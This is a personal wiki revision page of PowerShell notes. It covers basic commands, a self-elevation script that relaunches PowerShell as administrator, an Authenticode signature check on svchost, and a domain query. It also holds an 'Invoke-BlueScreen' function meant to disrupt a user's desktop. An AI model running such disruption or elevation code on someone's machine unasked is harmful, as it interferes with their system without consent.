Powershell: Difference between revisions

From WikiWiki
Jump to navigation Jump to search
No edit summary   (change visibility)
No edit summary   (change visibility)
Line 9: Line 9:
*Get-ChildItem Env:
*Get-ChildItem Env:


= invoke bluescreen bsod =
<syntaxhighlight lang="powershell">
function Invoke-BlueScreen
{
    Add-Type "
      using System;
      using System.Runtime.InteropServices;
      public class PInvoke
      {
          [DllImport(`"user32.dll`")]
          public static extern IntPtr CreateDesktop(string desktopName, IntPtr device, IntPtr deviceMode, int flags, long accessMask, IntPtr attributes);
      }
    "
    [PInvoke]::CreateDesktop("BSOD", [IntPtr]::Zero, [IntPtr]::Zero, 0, $null, [IntPtr]::Zero)
}
</syntaxhighlight>


= self elevate =
= self elevate =
Start-Process PowerShell –Verb RunAs
or


Start-Process PowerShell –Verb RunAs
<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
# Get the ID and security principal of the current user account
# Get the ID and security principal of the current user account

Revision as of 13:59, 21 November 2013

  • get-help
  • get-command
  • get-module
  • $PSVersionTable.psversion
  • get-history
  • get-process | get-member
  • Get-Host
  • $psversiontable
  • Get-ChildItem Env:


invoke bluescreen bsod

function Invoke-BlueScreen
{
    Add-Type "
      using System;
      using System.Runtime.InteropServices;
      public class PInvoke
      {
          [DllImport(`"user32.dll`")]
          public static extern IntPtr CreateDesktop(string desktopName, IntPtr device, IntPtr deviceMode, int flags, long accessMask, IntPtr attributes);
      }
    "

    [PInvoke]::CreateDesktop("BSOD", [IntPtr]::Zero, [IntPtr]::Zero, 0, $null, [IntPtr]::Zero)
}

self elevate

Start-Process PowerShell –Verb RunAs

or

# Get the ID and security principal of the current user account
$myWindowsID=[System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal=new-object System.Security.Principal.WindowsPrincipal($myWindowsID)
 
# Get the security principal for the Administrator role
$adminRole=[System.Security.Principal.WindowsBuiltInRole]::Administrator
 
# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole))
   {
   # We are running "as Administrator" - so change the title and background color to indicate this
   $Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated)"
   $Host.UI.RawUI.BackgroundColor = "DarkBlue"
   clear-host
   }
else
   {
   # We are not running "as Administrator" - so relaunch as administrator
   
   # Create a new process object that starts PowerShell
   $newProcess = new-object System.Diagnostics.ProcessStartInfo "PowerShell";
   
   # Specify the current script path and name as a parameter
   $newProcess.Arguments = $myInvocation.MyCommand.Definition;
   
   # Indicate that the process should be elevated
   $newProcess.Verb = "runas";
   
   # Start the new process
   [System.Diagnostics.Process]::Start($newProcess);
   
   # Exit from the current, unelevated, process
   exit
   }
 
# Run your code that needs to be elevated here
Write-Host -NoNewLine "Press any key to continue..."
$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")


check authenticity of process

PS C:\WINDOWS\system32> (get-process svchost | select-object path).path | Get-AuthenticodeSignature


    Directory: C:\WINDOWS\system32


SignerCertificate                         Status                                 Path
-----------------                         ------                                 ----
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe


#get info about domain
get-addomain